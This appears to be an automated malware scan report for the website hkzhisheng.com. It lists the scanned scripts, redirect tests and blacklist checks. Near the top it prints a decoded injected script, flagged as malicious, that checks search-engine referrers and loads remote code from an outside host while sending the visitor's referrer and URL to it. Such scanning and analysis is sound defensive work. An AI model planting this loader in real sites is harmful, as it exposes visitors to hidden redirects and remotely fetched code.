Scanned pages/files
Request | Server response | Status |
http://hkzhisheng.com/ | 200 OK Content-Length: 15238 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
Decoded script:
var _escape='%3Cscript%3E%0Afunction%20R%28%29%7Bvar%20Ref%3Ddocument.referrer%3Bif%28Ref.indexOf%28%27.google.%27%29%21%3D-1%7C%7CRef.indexOf%28%27vk.%27%29%21%3D-1%7C%7CRef.indexOf%28%27google.%27%29%21%3D-1%7C%7CRef.indexOf%28%27.yandex.%27%29%21%3D-1%7C%7CRef.indexOf%28%27yandex.%27%29%21%3D-1%7C%7CRef.indexOf%28%27.bing.%27%29%21%3D-1%7C%7CRef.indexOf%28%27.yahoo.%27%29%21%3D-1%7C%7CRef.indexOf%28%27.aol.%27%29%21%3D-1%7C%7CRef.indexOf%28%27.ask.%27%29%21%3D-1%7C%7CRef.indexOf%28%27.al
_1Ol.src = 'http://api.myobfuscate.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);
var OOI = document.getElementsByTagName('head')[0];
OOI.appendChild(_1Ol);
document.write(unescape(_escape));
Antivirus reports:
http://www.hkzhisheng.com/js/common.js | 200 OK Content-Length: 2564 Content-Type: application/javascript | clean |
http://www.hkzhisheng.com/js/ajax.js | 200 OK Content-Length: 11824 Content-Type: application/javascript | clean |
http://www.hkzhisheng.com/js/prototype.js | 200 OK Content-Length: 73780 Content-Type: application/javascript | clean |
http://www.hkzhisheng.com/js/search.js | 200 OK Content-Length: 5840 Content-Type: application/javascript | clean |
http://www.hkzhisheng.com/js/ddlevelsmenu.js | 200 OK Content-Length: 16968 Content-Type: application/javascript | clean |
http://www.hkzhisheng.com/js/jquery.min.js | 200 OK Content-Length: 57272 Content-Type: application/javascript | clean |
http://www.hkzhisheng.com/skin/nitc3/en/js/jqselect.js | 200 OK Content-Length: 5226 Content-Type: application/javascript | clean |
http://www.hkzhisheng.com/vcall.php?language=1&flag=banner | 200 OK Content-Length: 974 Content-Type: text/html | clean |
http://www.hkzhisheng.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://www.hkzhisheng.com/js/statistics.js | 200 OK Content-Length: 3550 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hkzhisheng.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 24 Nov 2014 06:10:04 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 15238
Content-Type: text/html
Last-Modified: Thu, 20 Nov 2014 08:21:39 GMT
...15238 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: hkzhisheng.com
Referer: http://www.google.com/search?q=hkzhisheng.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hkzhisheng.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://hkzhisheng.com/
Result: hkzhisheng.com is not infected or malware details are not published yet.